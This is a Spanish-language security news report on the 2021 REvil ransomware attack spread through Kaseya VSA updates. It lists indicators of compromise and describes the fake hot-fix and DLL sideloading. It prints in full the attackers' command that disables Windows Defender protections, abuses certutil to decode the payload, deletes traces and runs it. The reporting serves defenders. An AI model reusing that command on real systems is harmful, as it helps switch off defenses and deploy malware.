Unas 200 empresas (en EE.UU.) fueron objeto de un ciberataque extorsivo a través del software de gestión de la estadounidense Kaseya, dijo el viernes la compañía de seguridad informática Huntress Labs.

El objetivo del ataque fue la compañía de tecnología informática Kaseya, basada en Florida, y luego se extendió por las redes corporativas que usan su software. La firma Kaseya reconoció que una de sus aplicaciones que administra servidores corporativos, computadoras de escritorio y dispositivos en red pudo haber estado comprometida en el ataque.

Kaseya, una empresa de software que brinda servicios a más de 40.000 organizaciones en todo el mundo y confirmó que su plataforma de administración de sistemas, llamada VSA, sufrió un «sofisticado» ciberataque que se realizó se propagó a través de una actualización maliciosa de de Kaseya VSA, plataforma utilizada por múltiples proveedores de servicios gestionados (MSP).

Es decir que se trata de un ataque a la cadena de suministro a través de Kaseya VSA, un software tipo Managed Service Provider (MSP) para control remoto y patching.

«Estamos investigando un posible ataque al (software) VSA que parece haberse limitado a un pequeño número de nuestros clientes en el sitio», señaló Kaseya en su sitio web, agregando que cerró algunos servidores «por cautela». El grupo, que dijo estar «investigando la fuente del problema», también pidió a todos sus clis que ejecutan su software que apaguen los servidores que lo alojan.

La Agencia de Estados Unidos para la Seguridad Cibernética y la Infraestructura (CISA) dijo en su propio sitio web que estaba tomando medidas «para comprender y abordar el reciente ataque de ransomware» contra el programa VSA de Kaseya y múltiples proveedores de servicios. Según Huntress Labs, «alrededor de 200 (solo contando EEUU) empresas fueron tomadas como blanco por los delincuentes», sin que el grupo especifique su tamaño o sector de actividad, aunque el número seguirá creciendo con las horas.

Detalles técnicos

El 2 de julio, se utilizaron muchos servidores Kaseya VSA para implementar ransomware en el sistema de sus clientes. Aquí están los detalles de esa intrusión inicial:

  • La entrada inicial fue utilizando una vulnerabilidad Zero-Day en Kaseya VSA. Entonces, incluso si se utiliza la última versión, en el momento del ataque, los delincuentes podrían ejecutar comandos de forma remota en el dispositivo VSA. No se proporcionarán detalles técnicos sobre cómo aprovechar la vulnerabilidad hasta que el parche esté disponible. No es una buena señal que una banda de ransomware tenga un día cero en productos utilizados ampliamente por los proveedores de servicios administrados, y muestra la escalada continua de bandas de ransomware. Kaseya está preparando una actualización de software para corregir la vulnerabilidad.
  • La entrega de ransomware se realiza a través de una actualización de software falsa y automatizada mediante Kaseya VSA. El atacante detiene inmediatamente el acceso del administrador al VSA, y luego agrega una tarea llamada «Kaseya VSA Agent Hot-fix». Luego, esta actualización falsa se implementa en toda las instalación, incluso en los sistemas de los clientes de MSP, como una actualización de agente de administración falsa. Esta actualización del agente de administración es en realidad REvil ransomware.
  • Los ejecutables del ransomware se colocan en TempPath de Kaseya con el nombre de archivo agent.exe, generalmente c:\kworking\agent.exe que se obtiene desde HKLM\SOFTWARE\WOW6432Node\Kaseya\Agent\<id>.
  • El procedimiento de VSA utilizado para ejecutar el ransomware se denominó «Kaseya VSA Agent Hot-fix». Los procedimientos adicionales fueron «Archivar y purgar registros» (captura de pantalla).
  • The «Kaseya VSA Agent Hot-fix» ejecuta lo siguiente a través de LOLBAS. Se ejecuta el siguiente comando, que:
    1. Desactiva la supervisión en tiempo real
    2. Desactiva IPS
    3. Deshabilita la búsqueda en la nube
    4. Inhabilita el análisis de secuencias de comandos
    5. Acceso a carpetas controlado deshabilitado (función de prevención de ransomware)
    6. Desactiva la protección de red
    7. Detiene el envío de muestras a la nube

      "C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

  • Por diseño, Kaseya está diseñado para permitir la administración de sistemas con privilegios de alto nivel. De modo que el ransomware puede llegar a todos los sistemas. Los atacantes enviaron una actualización del agente de administración, que se instala automáticamente en todos los sistemas administrados, lo que significa un impacto muy amplio. Además, Kaseya recomienda exclusiones de antivirus en algunas carpetas utilizadas durante la implementación de este malware.
  • Cuando «agent.exe» se ejecuta, el ejecutable legítimo de Windows Defender (MsMpEng.exe) y el payload cifrador de Sodinokibi (mpsvc.dll) son copiados en un path hardcodeado «c:\Windows» para ejecutar un DLL-sideloading.
  • La DLL de Sodinokibi (mpsvc.dll) crea la clave HKLM\SOFTWARE\WOW6432Node\BlackLivesMatter con varios valores relaciones a claves y configuraciones del malware.

«De acuerdo a la nota de ransomware y la URL TOR un integrante del grupo de delincuentes informáticos conocido como REvil o Sodinokibi está detrás de estas intrusiones», dijo Huntress Labs en un nota publicada en Reddit, junto a los IoCs conocidos.

  • agent.exe: d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
  • mpsvc.dll (primera sideloaded DLL): e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2
  • mpsvc.dll (otra sideloaded DLL): 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
  • 0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402
  • cc0cdc6a3d843e22c98170713abf1d6ae06e8b5e34ed06ac3159adafe85e3bd6
  • d5ce6f36a06b0dc8ce8e7e2c9a53e66094c2adfc93cfac61dd09efe9ac45a75f
  • d8353cfc5e696d3ae402c7c70565c1e7f31e49bcf74a6e12e5ab044f306b4b20
  • 1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e
  • aae6e388e774180bc3eb96dad5d5bfefd63d0eb7124d68b6991701936801f1c7
  • dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f
  • df2d6ef0450660aaae62c429610b964949812df2da1c57646fc29aa51c3f031e
  • Certificado: Serial Number = 11 9A CE AD 66 8B AD 57 A4 8B 4F 42 F2 94 F8 F0
  • Archivo de configuración de REvil y C&C: https://gist.github.com/fwosar/a63e1249bfccb8395b961d3d780c0354
  • Página de pago: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd[.]onion/
  • Presencia del archivo «userfiltertablerpt.asp» en el web-root público.
  • 18.223.199[.]234 (AWS)
  • 35.226.94[.]113
  • 161.35.239[.]148
  • 162.253.124[.]162
  • Dominios utilizados como C&C.

Actualizaciones…

  • Kaseya ha desarrollado una herramienta de detección y está disponible para los clientes de Kaseya VSA que la soliciten, para ayudarlos a evaluar el estado de sus sistemas (o el de sus clientes).
  • Se han publicado reglas de YARA para la detección del certificado y REvil Kaseya Attack.
  • La empresa Huntress Labs solicita ayuda para enviar logs que potencialmente pueden ser analizados.
  • El número actualizado de MSP impactados confirmados, las regiones donde ocurrieron y una declaración clara de que más de 1.000 empresas tienen servidores y estaciones de trabajo cifrados.
  • Fabian Wosar publicó una copia descifrada de la configuración del cifrador REvil/Sodin. Este archivo contiene detalles sobre la carga útil del ransomware, incluidas las listas de eliminación de procesos, los componentes de la lista blanca y los dominios de comando y control utilizados.
  • Lista de dominios .COM.AR que son utilizados como C&C:
    • ventti[.]com.ar
    • plastidip[.]com.ar
    • argenblogs[.]com.ar – actualidadbonaerense[.]com
    • delchacay[.]com.ar
    • Todos los dominios
  • REvil ha publicado el ataque en su sitio web y aspira a cobrar 70 millones de dólares por una herramienta que permita descifrar la información de todos los afectados.
  • Kaseya ha compartido más información oficial sobre el ataque y la herramienta de análisis del sistema que determina si hay IoC presentes.
  • El investigador de seguridad de Huntress Lab Caleb Stewart ha reproducido con éxito los exploits de Kaseya VSA utilizados para implementar el ransomware REvil/Sodinokibi y publicó un video de demostración que muestra:
    1. una omisión de autenticación
    2. una carga de archivo arbitraria
    3. inyección de comandosAunque los atacantes no entregaron un implante con su exploit, la segunda mitad del video muestra cómo podría haberse hecho (se usó MSFVenom para generar un binario Meterpreter y se capturó la devolución de llamada con pwncat).

Fuente y redacción: segu-info.com.ar

Compartir